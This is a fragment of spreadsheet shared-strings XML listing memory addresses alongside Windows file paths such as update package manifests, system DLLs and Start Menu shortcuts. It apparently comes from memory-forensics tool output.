    <t>0xdea0db98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-InternetExplorer-Package~31bf3856ad364e35~x86~en</t>
  </si>
  <si>
    <t>-US~8.0.7600.</t>
  </si>
  <si>
    <t>0xdea0de60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_206_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0df80</t>
  </si>
  <si>
    <t>0xdea0e2d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB4483187~31bf3856ad364e35~x86~~11.2.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0e608</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB4483187~31bf3856ad364e35~x86~~11.2.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0e6c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4483187_RTM~31bf3856ad364e35~x86~~11.2.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0e8d0</t>
  </si>
  <si>
    <t>0xdea0eec8</t>
  </si>
  <si>
    <t>0xdea0ef80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4483187~31bf3856ad364e35~x86~~11.2.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0f338</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2510531_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0f480</t>
  </si>
  <si>
    <t>0xdea0fa78</t>
  </si>
  <si>
    <t>0xdea0fb30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2510531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0fdf8</t>
  </si>
  <si>
    <t>-US~11.2.9600</t>
  </si>
  <si>
    <t>.16428.mum_x001B_</t>
  </si>
  <si>
    <t>0xdea0ff18</t>
  </si>
  <si>
    <t>-US~8.0.7601.</t>
  </si>
  <si>
    <t>0xdea101e0</t>
  </si>
  <si>
    <t>0xdea10298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2703157~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea10680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2510531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea109b0</t>
  </si>
  <si>
    <t>0xdea10a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2510531_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea10f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2510531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea11270</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2703157_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea115a0</t>
  </si>
  <si>
    <t>0xdea11658</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2703157~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea11a40</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2703157_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea11b88</t>
  </si>
  <si>
    <t>0xdea11eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2985461~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea121d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2598845~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea12500</t>
  </si>
  <si>
    <t>0xdea125b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2598845_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea128e8</t>
  </si>
  <si>
    <t>0xdea129a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2598845~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea12e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2703157~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea13220</t>
  </si>
  <si>
    <t>0xdea133d0</t>
  </si>
  <si>
    <t>0xdea13a18</t>
  </si>
  <si>
    <t>0xdea13ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2598845~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea13eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2598845_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea14100</t>
  </si>
  <si>
    <t>0xdea142d8</t>
  </si>
  <si>
    <t>0xdea14488</t>
  </si>
  <si>
    <t>0xdea146e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685811_SP1~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K_x001B_[</t>
  </si>
  <si>
    <t>103G</t>
  </si>
  <si>
    <t>0xdea14a18</t>
  </si>
  <si>
    <t>0xdea14ad0</t>
  </si>
  <si>
    <t>0xdea14eb8</t>
  </si>
  <si>
    <t>0xdea15038</t>
  </si>
  <si>
    <t>0xdea15300</t>
  </si>
  <si>
    <t>0xdea155c8</t>
  </si>
  <si>
    <t>0xdea156e8</t>
  </si>
  <si>
    <t>0xdea15a18</t>
  </si>
  <si>
    <t>0xdea15ad0</t>
  </si>
  <si>
    <t>0xdea15eb8</t>
  </si>
  <si>
    <t>0xdea162a8</t>
  </si>
  <si>
    <t>0xdea16360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-BlueIP-Package~31bf3856ad364e35~x86~~7.2.760</t>
  </si>
  <si>
    <t>1.16415.mum_x001B_[</t>
  </si>
  <si>
    <t>0xdea16628</t>
  </si>
  <si>
    <t>0xdea16748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-WinIP-Package~31bf3856ad364e35~x86~en-US~7.1</t>
  </si>
  <si>
    <t>.7601.16398.m</t>
  </si>
  <si>
    <t>0xdea16a78</t>
  </si>
  <si>
    <t>0xdea16b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-WinIP-Package~31bf3856ad364e35~x86~~7.1.7601</t>
  </si>
  <si>
    <t>.16398.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xdea16f18</t>
  </si>
  <si>
    <t>0xdea17298</t>
  </si>
  <si>
    <t>0xdea175c8</t>
  </si>
  <si>
    <t>0xdea17680</t>
  </si>
  <si>
    <t>0xdea17a68</t>
  </si>
  <si>
    <t>0xdea17e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-BlueIP-Package~31bf3856ad364e35~x86~en-US~7.</t>
  </si>
  <si>
    <t>2.7601.16415.</t>
  </si>
  <si>
    <t>0xdea181e0</t>
  </si>
  <si>
    <t>0xdea18298</t>
  </si>
  <si>
    <t>0xdea185c8</t>
  </si>
  <si>
    <t>0xdea18680</t>
  </si>
  <si>
    <t>0xdea18a68</t>
  </si>
  <si>
    <t>0xdea18d98</t>
  </si>
  <si>
    <t>0xdea18e50</t>
  </si>
  <si>
    <t>0xdea191b8</t>
  </si>
  <si>
    <t>0xdea19270</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB2808679~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea19658</t>
  </si>
  <si>
    <t>0xdea19a40</t>
  </si>
  <si>
    <t>0xdea19bf0</t>
  </si>
  <si>
    <t>0xdea19eb8</t>
  </si>
  <si>
    <t>0xdea1a1b8</t>
  </si>
  <si>
    <t>0xdea1a270</t>
  </si>
  <si>
    <t>0xdea1a658</t>
  </si>
  <si>
    <t>0xdea1ae50</t>
  </si>
  <si>
    <t>0xdea1b1b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2972211_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea1b270</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2836943_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea1b5c8</t>
  </si>
  <si>
    <t>0xdea1b6e8</t>
  </si>
  <si>
    <t>0xdea1ba68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2836943~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea1bd98</t>
  </si>
  <si>
    <t>0xdea1be50</t>
  </si>
  <si>
    <t>0xdea1c1b8</t>
  </si>
  <si>
    <t>0xdea1c270</t>
  </si>
  <si>
    <t>0xdea1c658</t>
  </si>
  <si>
    <t>0xdea1ca40</t>
  </si>
  <si>
    <t>0xdea1cc38</t>
  </si>
  <si>
    <t>0xdea1ccf0</t>
  </si>
  <si>
    <t>0xdea1d2b8</t>
  </si>
  <si>
    <t>0xdea1d3d8</t>
  </si>
  <si>
    <t>0xdea1d5c0</t>
  </si>
  <si>
    <t>0xdea1d9a8</t>
  </si>
  <si>
    <t>0xdea1dc58</t>
  </si>
  <si>
    <t>0xdea1e2f0</t>
  </si>
  <si>
    <t>0xdea1e5b8</t>
  </si>
  <si>
    <t>0xdea1e9a0</t>
  </si>
  <si>
    <t>0xdea1ecd0</t>
  </si>
  <si>
    <t>0xdea1ed88</t>
  </si>
  <si>
    <t>0xdea1f2a8</t>
  </si>
  <si>
    <t>0xdea1f360</t>
  </si>
  <si>
    <t>0xdea1f748</t>
  </si>
  <si>
    <t>0xdea1fa78</t>
  </si>
  <si>
    <t>0xdea1fb30</t>
  </si>
  <si>
    <t>0xdea1fe60</t>
  </si>
  <si>
    <t>0xdea1ff18</t>
  </si>
  <si>
    <t>0xdea20240</t>
  </si>
  <si>
    <t>0xdea20360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_59_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea20690</t>
  </si>
  <si>
    <t>0xdea20748</t>
  </si>
  <si>
    <t>0xdea20b30</t>
  </si>
  <si>
    <t>0xdea20df8</t>
  </si>
  <si>
    <t>0xdea20f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2908783~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea21298</t>
  </si>
  <si>
    <t>0xdea21560</t>
  </si>
  <si>
    <t>0xdea21680</t>
  </si>
  <si>
    <t>0xdea21a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_87_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea21d98</t>
  </si>
  <si>
    <t>0xdea21e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_86_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea222f0</t>
  </si>
  <si>
    <t>0xdea223a8</t>
  </si>
  <si>
    <t>0xdea22530</t>
  </si>
  <si>
    <t>0xdea225e8</t>
  </si>
  <si>
    <t>0xdea228b0</t>
  </si>
  <si>
    <t>0xdea229d0</t>
  </si>
  <si>
    <t>0xdea22db8</t>
  </si>
  <si>
    <t>0xdea231a8</t>
  </si>
  <si>
    <t>0xdea23470</t>
  </si>
  <si>
    <t>0xdea23590</t>
  </si>
  <si>
    <t>0xdea23978</t>
  </si>
  <si>
    <t>0xdea23c28</t>
  </si>
  <si>
    <t>0xdea24398</t>
  </si>
  <si>
    <t>0xdea24450</t>
  </si>
  <si>
    <t>0xdea249b0</t>
  </si>
  <si>
    <t>0xdea24a68</t>
  </si>
  <si>
    <t>0xdea24e50</t>
  </si>
  <si>
    <t>0xdea25228</t>
  </si>
  <si>
    <t>0xdea25348</t>
  </si>
  <si>
    <t>0xdea256e8</t>
  </si>
  <si>
    <t>0xdea259b0</t>
  </si>
  <si>
    <t>0xdea25ad0</t>
  </si>
  <si>
    <t>0xdea25eb8</t>
  </si>
  <si>
    <t>0xdea26430</t>
  </si>
  <si>
    <t>0xdea266f8</t>
  </si>
  <si>
    <t>0xdea26818</t>
  </si>
  <si>
    <t>0xdea26b30</t>
  </si>
  <si>
    <t>0xdea26f18</t>
  </si>
  <si>
    <t>0xdea270d0</t>
  </si>
  <si>
    <t>0xdea27400</t>
  </si>
  <si>
    <t>0xdea274b8</t>
  </si>
  <si>
    <t>0xdea27780</t>
  </si>
  <si>
    <t>0xdea278a0</t>
  </si>
  <si>
    <t>0xdea27c88</t>
  </si>
  <si>
    <t>0xdea27f80</t>
  </si>
  <si>
    <t>0xdea28240</t>
  </si>
  <si>
    <t>0xdea28360</t>
  </si>
  <si>
    <t>0xdea28628</t>
  </si>
  <si>
    <t>0xdea28748</t>
  </si>
  <si>
    <t>0xdea28b30</t>
  </si>
  <si>
    <t>0xdea28e60</t>
  </si>
  <si>
    <t>0xdea28f18</t>
  </si>
  <si>
    <t>0xdea291d8</t>
  </si>
  <si>
    <t>0xdea292f8</t>
  </si>
  <si>
    <t>0xdea296e0</t>
  </si>
  <si>
    <t>0xdea29b90</t>
  </si>
  <si>
    <t>0xdea29c50</t>
  </si>
  <si>
    <t>0xdea29f80</t>
  </si>
  <si>
    <t>0xdea2a1d0</t>
  </si>
  <si>
    <t>0xdea2a2f0</t>
  </si>
  <si>
    <t>0xdea2a698</t>
  </si>
  <si>
    <t>.mum_x001B_[0K_x001B_[103</t>
  </si>
  <si>
    <t>0xdea2a750</t>
  </si>
  <si>
    <t>0xdea2ab38</t>
  </si>
  <si>
    <t>0xdea2aeb8</t>
  </si>
  <si>
    <t>0xdea2b348</t>
  </si>
  <si>
    <t>0xdea2b730</t>
  </si>
  <si>
    <t>0xdea2b9f8</t>
  </si>
  <si>
    <t>0xdea2bb18</t>
  </si>
  <si>
    <t>0xdea2be18</t>
  </si>
  <si>
    <t>0xdea2c360</t>
  </si>
  <si>
    <t>0xdea2c748</t>
  </si>
  <si>
    <t>0xdea2ca10</t>
  </si>
  <si>
    <t>0xdea2cb30</t>
  </si>
  <si>
    <t>0xdea2cf18</t>
  </si>
  <si>
    <t>0xdea2d240</t>
  </si>
  <si>
    <t>0xdea2d360</t>
  </si>
  <si>
    <t>0xdea2d748</t>
  </si>
  <si>
    <t>0xdea2da78</t>
  </si>
  <si>
    <t>0xdea2db30</t>
  </si>
  <si>
    <t>0xdea2ddf8</t>
  </si>
  <si>
    <t>0xdea2df18</t>
  </si>
  <si>
    <t>0xdea2e360</t>
  </si>
  <si>
    <t>0xdea2e628</t>
  </si>
  <si>
    <t>0xdea2e748</t>
  </si>
  <si>
    <t>0xdea2eb30</t>
  </si>
  <si>
    <t>0xdea2ee60</t>
  </si>
  <si>
    <t>\Windows\System32\printui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea2ef18</t>
  </si>
  <si>
    <t>0xdea2f360</t>
  </si>
  <si>
    <t>0xdea2f690</t>
  </si>
  <si>
    <t>0xdea2f748</t>
  </si>
  <si>
    <t>0xdea2fa10</t>
  </si>
  <si>
    <t>0xdea2fb30</t>
  </si>
  <si>
    <t>0xdea2ff18</t>
  </si>
  <si>
    <t>0xdea30240</t>
  </si>
  <si>
    <t>0xdea30360</t>
  </si>
  <si>
    <t>0xdea30748</t>
  </si>
  <si>
    <t>0xdea30b30</t>
  </si>
  <si>
    <t>0xdea30df8</t>
  </si>
  <si>
    <t>0xdea30f18</t>
  </si>
  <si>
    <t>0xdea312a8</t>
  </si>
  <si>
    <t>0xdea31360</t>
  </si>
  <si>
    <t>0xdea31628</t>
  </si>
  <si>
    <t>0xdea31748</t>
  </si>
  <si>
    <t>0xdea31b30</t>
  </si>
  <si>
    <t>0xdea31f18</t>
  </si>
  <si>
    <t>0xdea32360</t>
  </si>
  <si>
    <t>0xdea32628</t>
  </si>
  <si>
    <t>0xdea32748</t>
  </si>
  <si>
    <t>0xdea32a10</t>
  </si>
  <si>
    <t>0xdea32b30</t>
  </si>
  <si>
    <t>0xdea32f18</t>
  </si>
  <si>
    <t>0xdea336b0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WmiPerfInst.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea337d0</t>
  </si>
  <si>
    <t>0xdea33b80</t>
  </si>
  <si>
    <t>0xdea33db8</t>
  </si>
  <si>
    <t>0xdea34038</t>
  </si>
  <si>
    <t>0xdea343a0</t>
  </si>
  <si>
    <t>0xdea34458</t>
  </si>
  <si>
    <t>0xdea34840</t>
  </si>
  <si>
    <t>0xdea34f18</t>
  </si>
  <si>
    <t>0xdea351e0</t>
  </si>
  <si>
    <t>0xdea356f8</t>
  </si>
  <si>
    <t>0xdea357b0</t>
  </si>
  <si>
    <t>0xdea35b98</t>
  </si>
  <si>
    <t>0xdea35f80</t>
  </si>
  <si>
    <t>0xdea36038</t>
  </si>
  <si>
    <t>0xdea36480</t>
  </si>
  <si>
    <t>0xdea367b0</t>
  </si>
  <si>
    <t>0xdea36868</t>
  </si>
  <si>
    <t>0xdea36c50</t>
  </si>
  <si>
    <t>0xdea36f18</t>
  </si>
  <si>
    <t>0xdea372d0</t>
  </si>
  <si>
    <t>0xdea373f0</t>
  </si>
  <si>
    <t>0xdea377b0</t>
  </si>
  <si>
    <t>0xdea37ae0</t>
  </si>
  <si>
    <t>0xdea37b98</t>
  </si>
  <si>
    <t>0xdea37f80</t>
  </si>
  <si>
    <t>0xdea38038</t>
  </si>
  <si>
    <t>0xdea38200</t>
  </si>
  <si>
    <t>0xdea38530</t>
  </si>
  <si>
    <t>0xdea385e8</t>
  </si>
  <si>
    <t>0xdea389d0</t>
  </si>
  <si>
    <t>0xdea38db8</t>
  </si>
  <si>
    <t>0xdea390e8</t>
  </si>
  <si>
    <t>0xdea391e0</t>
  </si>
  <si>
    <t>0xdea39480</t>
  </si>
  <si>
    <t>0xdea39868</t>
  </si>
  <si>
    <t>0xdea39c50</t>
  </si>
  <si>
    <t>0xdea3a200</t>
  </si>
  <si>
    <t>0xdea3a5e8</t>
  </si>
  <si>
    <t>0xdea3a9d0</t>
  </si>
  <si>
    <t>0xdea3adb8</t>
  </si>
  <si>
    <t>0xdea3b1d8</t>
  </si>
  <si>
    <t>0xdea3b458</t>
  </si>
  <si>
    <t>0xdea3b808</t>
  </si>
  <si>
    <t>0xdea3bc50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_84_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea3bef0</t>
  </si>
  <si>
    <t>0xdea3c038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini_x001B_[</t>
  </si>
  <si>
    <t>0xdea3c1b0</t>
  </si>
  <si>
    <t>0xdea3c560</t>
  </si>
  <si>
    <t>0xdea3c8f0</t>
  </si>
  <si>
    <t>0xdea3c9a8</t>
  </si>
  <si>
    <t>0xdea3cd58</t>
  </si>
  <si>
    <t>0xdea3d038</t>
  </si>
  <si>
    <t>0xdea3d1b0</t>
  </si>
  <si>
    <t>0xdea3d440</t>
  </si>
  <si>
    <t>0xdea3d560</t>
  </si>
  <si>
    <t>0xdea3d888</t>
  </si>
  <si>
    <t>0xdea3d9a8</t>
  </si>
  <si>
    <t>0xdea3dd58</t>
  </si>
  <si>
    <t>0xdea3e1d8</t>
  </si>
  <si>
    <t>0xdea3e508</t>
  </si>
  <si>
    <t>0xdea3e5c0</t>
  </si>
  <si>
    <t>0xdea3e9a8</t>
  </si>
  <si>
    <t>0xdea3ed58</t>
  </si>
  <si>
    <t>0xdea3f038</t>
  </si>
  <si>
    <t>0xdea3f200</t>
  </si>
  <si>
    <t>0xdea3f530</t>
  </si>
  <si>
    <t>0xdea3f5e8</t>
  </si>
  <si>
    <t>0xdea3f9d0</t>
  </si>
  <si>
    <t>0xdea3fdb8</t>
  </si>
  <si>
    <t>0xdea40200</t>
  </si>
  <si>
    <t>0xdea40530</t>
  </si>
  <si>
    <t>0xdea405e8</t>
  </si>
  <si>
    <t>0xdea409d0</t>
  </si>
  <si>
    <t>0xdea40db8</t>
  </si>
  <si>
    <t>0xdea41148</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xdea41200</t>
  </si>
  <si>
    <t>0xdea41530</t>
  </si>
  <si>
    <t>0xdea415e8</t>
  </si>
  <si>
    <t>0xdea419d0</t>
  </si>
  <si>
    <t>0xdea41c98</t>
  </si>
  <si>
    <t>0xdea41db8</t>
  </si>
  <si>
    <t>0xdea42200</t>
  </si>
  <si>
    <t>0xdea42530</t>
  </si>
  <si>
    <t>0xdea425e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_437_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K_x001B_[1</t>
  </si>
  <si>
    <t>29G</t>
  </si>
  <si>
    <t>0xdea429d0</t>
  </si>
  <si>
    <t>0xdea42db8</t>
  </si>
  <si>
    <t>0xdea43100</t>
  </si>
  <si>
    <t>0xdea431d8</t>
  </si>
  <si>
    <t>0xdea43588</t>
  </si>
  <si>
    <t>0xdea439d0</t>
  </si>
  <si>
    <t>0xdea43db8</t>
  </si>
  <si>
    <t>0xdea44480</t>
  </si>
  <si>
    <t>0xdea44868</t>
  </si>
  <si>
    <t>0xdea44b30</t>
  </si>
  <si>
    <t>0xdea44c50</t>
  </si>
  <si>
    <t>0xdea44f80</t>
  </si>
  <si>
    <t>0xdea45200</t>
  </si>
  <si>
    <t>0xdea455e8</t>
  </si>
  <si>
    <t>0xdea45918</t>
  </si>
  <si>
    <t>\Users\Support\Favorites\Links\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea459d0</t>
  </si>
  <si>
    <t>0xdea45d00</t>
  </si>
  <si>
    <t>0xdea45db8</t>
  </si>
  <si>
    <t>0xdea46458</t>
  </si>
  <si>
    <t>0xdea466a0</t>
  </si>
  <si>
    <t>0xdea46868</t>
  </si>
  <si>
    <t>0xdea46c50</t>
  </si>
  <si>
    <t>0xdea46f80</t>
  </si>
  <si>
    <t>0xdea47200</t>
  </si>
  <si>
    <t>0xdea474c8</t>
  </si>
  <si>
    <t>0xdea475e8</t>
  </si>
  <si>
    <t>0xdea47918</t>
  </si>
  <si>
    <t>0xdea479d0</t>
  </si>
  <si>
    <t>0xdea47db8</t>
  </si>
  <si>
    <t>0xdea48100</t>
  </si>
  <si>
    <t>0xdea481d8</t>
  </si>
  <si>
    <t>0xdea48508</t>
  </si>
  <si>
    <t>0xdea485c0</t>
  </si>
  <si>
    <t>0xdea487a0</t>
  </si>
  <si>
    <t>0xdea48db8</t>
  </si>
  <si>
    <t>0xdea491d8</t>
  </si>
  <si>
    <t>0xdea495c0</t>
  </si>
  <si>
    <t>0xdea499a8</t>
  </si>
  <si>
    <t>0xdea49b28</t>
  </si>
  <si>
    <t>0xdea4a480</t>
  </si>
  <si>
    <t>0xdea4a868</t>
  </si>
  <si>
    <t>0xdea4ac50</t>
  </si>
  <si>
    <t>0xdea4af80</t>
  </si>
  <si>
    <t>0xdea4b200</t>
  </si>
  <si>
    <t>0xdea4b5e8</t>
  </si>
  <si>
    <t>0xdea4b9d0</t>
  </si>
  <si>
    <t>0xdea4bd00</t>
  </si>
  <si>
    <t>0xdea4bdb8</t>
  </si>
  <si>
    <t>0xdea4c200</t>
  </si>
  <si>
    <t>0xdea4c530</t>
  </si>
  <si>
    <t>0xdea4c5e8</t>
  </si>
  <si>
    <t>0xdea4c9d0</t>
  </si>
  <si>
    <t>0xdea4cdb8</t>
  </si>
  <si>
    <t>0xdea4d200</t>
  </si>
  <si>
    <t>0xdea4d530</t>
  </si>
  <si>
    <t>0xdea4d5e8</t>
  </si>
  <si>
    <t>0xdea4d9d0</t>
  </si>
  <si>
    <t>0xdea4ddb8</t>
  </si>
  <si>
    <t>0xdea4e1d8</t>
  </si>
  <si>
    <t>0xdea4e320</t>
  </si>
  <si>
    <t>0xdea4e9d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2533552~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea4edb8</t>
  </si>
  <si>
    <t>0xdea4f200</t>
  </si>
  <si>
    <t>0xdea4f5e8</t>
  </si>
  <si>
    <t>0xdea4f8b0</t>
  </si>
  <si>
    <t>0xdea4f9d0</t>
  </si>
  <si>
    <t>0xdea4fd00</t>
  </si>
  <si>
    <t>0xdea4fdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2533552~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K_x001B_[144</t>
  </si>
  <si>
    <t>0xdea50200</t>
  </si>
  <si>
    <t>0xdea505e8</t>
  </si>
  <si>
    <t>0xdea509d0</t>
  </si>
  <si>
    <t>0xdea50d00</t>
  </si>
  <si>
    <t>0xdea50db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3046480~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea51200</t>
  </si>
  <si>
    <t>0xdea515e8</t>
  </si>
  <si>
    <t>0xdea519d0</t>
  </si>
  <si>
    <t>0xdea51d00</t>
  </si>
  <si>
    <t>0xdea51db8</t>
  </si>
  <si>
    <t>0xdea52038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea52148</t>
  </si>
  <si>
    <t>\Windows\System32\cfgmgr32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea52200</t>
  </si>
  <si>
    <t>0xdea525e8</t>
  </si>
  <si>
    <t>0xdea528b0</t>
  </si>
  <si>
    <t>0xdea529d0</t>
  </si>
  <si>
    <t>0xdea52d00</t>
  </si>
  <si>
    <t>0xdea52db8</t>
  </si>
  <si>
    <t>0xdea535e8</t>
  </si>
  <si>
    <t>0xdea539d0</t>
  </si>
  <si>
    <t>0xdea53d00</t>
  </si>
  <si>
    <t>0xdea53db8</t>
  </si>
  <si>
    <t>0xdea54038</t>
  </si>
  <si>
    <t>0xdea543c8</t>
  </si>
  <si>
    <t>0xdea54480</t>
  </si>
  <si>
    <t>0xdea54868</t>
  </si>
  <si>
    <t>0xdea54c50</t>
  </si>
  <si>
    <t>0xdea54f80</t>
  </si>
  <si>
    <t>0xdea55038</t>
  </si>
  <si>
    <t>0xdea55360</t>
  </si>
  <si>
    <t>0xdea55480</t>
  </si>
  <si>
    <t>0xdea557b0</t>
  </si>
  <si>
    <t>0xdea55868</t>
  </si>
  <si>
    <t>0xdea55c50</t>
  </si>
  <si>
    <t>0xdea55f80</t>
  </si>
  <si>
    <t>0xdea563c8</t>
  </si>
  <si>
    <t>0xdea567b0</t>
  </si>
  <si>
    <t>0xdea56ae0</t>
  </si>
  <si>
    <t>0xdea56b98</t>
  </si>
  <si>
    <t>0xdea56f80</t>
  </si>
  <si>
    <t>0xdea570d8</t>
  </si>
  <si>
    <t>0xdea57408</t>
  </si>
  <si>
    <t>\Windows\System32\mspaint.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea57788</t>
  </si>
  <si>
    <t>0xdea578d0</t>
  </si>
  <si>
    <t>0xdea57b98</t>
  </si>
  <si>
    <t>0xdea57ec8</t>
  </si>
  <si>
    <t>0xdea57f80</t>
  </si>
  <si>
    <t>0xdea58360</t>
  </si>
  <si>
    <t>0xdea58628</t>
  </si>
  <si>
    <t>0xdea58748</t>
  </si>
  <si>
    <t>0xdea58a78</t>
  </si>
  <si>
    <t>0xdea58b30</t>
  </si>
  <si>
    <t>0xdea58f18</t>
  </si>
  <si>
    <t>0xdea592a8</t>
  </si>
  <si>
    <t>0xdea59360</t>
  </si>
  <si>
    <t>0xdea59748</t>
  </si>
  <si>
    <t>0xdea59b30</t>
  </si>
  <si>
    <t>0xdea59e60</t>
  </si>
  <si>
    <t>0xdea59f18</t>
  </si>
  <si>
    <t>0xdea5a360</t>
  </si>
  <si>
    <t>0xdea5a5c8</t>
  </si>
  <si>
    <t>0xdea5a680</t>
  </si>
  <si>
    <t>0xdea5aa68</t>
  </si>
  <si>
    <t>0xdea5ae50</t>
  </si>
  <si>
    <t>0xdea5b0e0</t>
  </si>
  <si>
    <t>0xdea5b250</t>
  </si>
  <si>
